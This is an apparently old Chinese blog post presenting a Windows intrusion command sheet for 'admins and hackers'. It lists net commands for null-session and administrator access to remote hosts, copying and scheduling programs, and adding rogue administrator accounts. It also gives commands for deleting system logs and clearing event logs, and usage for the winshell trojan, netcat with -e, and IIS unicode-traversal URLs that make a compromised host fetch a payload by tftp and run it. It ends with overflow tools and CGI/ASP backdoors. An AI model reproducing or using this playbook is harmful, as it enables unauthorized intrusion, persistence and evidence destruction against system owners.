网管和黑客都必须知道的命令


常用的几条net命令:

(与远程主机建立空管连接) net use \\ip地址\ipc$ "" /use:""

(以管理员身份登录远程主机) net use \\ip地址\ipc$ "密码" /use:"administrator"

(传送文件到远程主机winnt目录下)copy 本机目录路径\程序 \\ip地址\admin$

(查看远程主机时间) net time \\ip地址

(定时启动某个程序) at \\ip地址 02:18 readme.exe

(查看共享) net view \\ip地址

(查看netbios工作组列表) nbtstat -a ip地址

(将远程主机c盘映射为自己的f盘) net use f: \\ip地址\c$ ""/user:"administrator"

(这两条把自己增加到管理员组): net user 用户名 密码 /add

net localgroup administrators 用户名 /add

(断开连接) net use \\ip地址\ipc$ /delete

扫尾:

del c:\winnt\system32\logfiles\*.*

del c:\winnt\ssytem32\config\*.evt

del c:\winnt\system32\dtclog\*.*

del c:\winnt\system32\*.log

del c:\winnt\system32\*.txt

del c:\winnt\*.txt

del c:\winnt\*.log



一、netsvc.exe

下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

netsvc /list \\ip地址

netsvc schedule \\ip地址 /query

netsvc \\ip地址 schedule /start

二、opentelnet.exe

远程启动主机的telnet服务,并绑定端口到7878,例如:

opentelnet \\ip地址 用户名 密码 1 7878

然后就可以telnet到主机的7878端口,进入dos方式下:

telnet ip地址 7878

三、winshell.exe

一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令:

p path (查看winshell主程序的路径信息)

b reboot (重新启动机器)

d shutdown (关闭机器)

s shell (执行后你就会看到可爱的“c:\>”)

x exit (退出本次登录会话,此命令并不终止winshell的运行)

cmd> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,gui方式登录远程主机的

五、elsave.exe

事件日志清除工具

elsave -s \\ip地址 -l "application" -c

elsave -s \\ip地址 -l "system" -c

elsave -s \\ip地址 -l "security" -c

执行后成功清除应用程序日志,系统日志,安全日志

六、hbulot.exe

开启win2kserver和winxp的3389服务

hbulot [/r]

使用/r表示安装完成后自动重起目标使设置生效。

七、nc.exe(netcat.exe)

一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

想要连接到某处: nc [-options] hostname port[s] [ports] ...

绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

参数:

-e prog 程序重定向,一旦连接,就执行 [危险!!]

-g gateway source-routing hop point[s], up to 8

-g num source-routing pointer: 4, 8, 12, ...

-h 帮助信息

-i secs 延时的间隔

-l 监听模式,用于入站连接

-n 指定数字的ip地址,不能用hostname

-o file 记录16进制的传输

-p port 本地端口号

-r 任意指定本地及远程端口

-s addr 本地源地址

-u udp模式

-v 详细输出——用两个-v可得到更详细的内容

-w secs timeout的时间

-z 将输入输出关掉——用于扫描时

八、tftpd32.exe

把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或telnet到肉鸡,例如:

http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机ip地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件运行:

http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是iis的printer远程缓冲区溢出工具

idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。


文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 7 | 引用: 0 | 查看次数: 715
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 20 字 | UBB代码 关闭 | [img]标签 关闭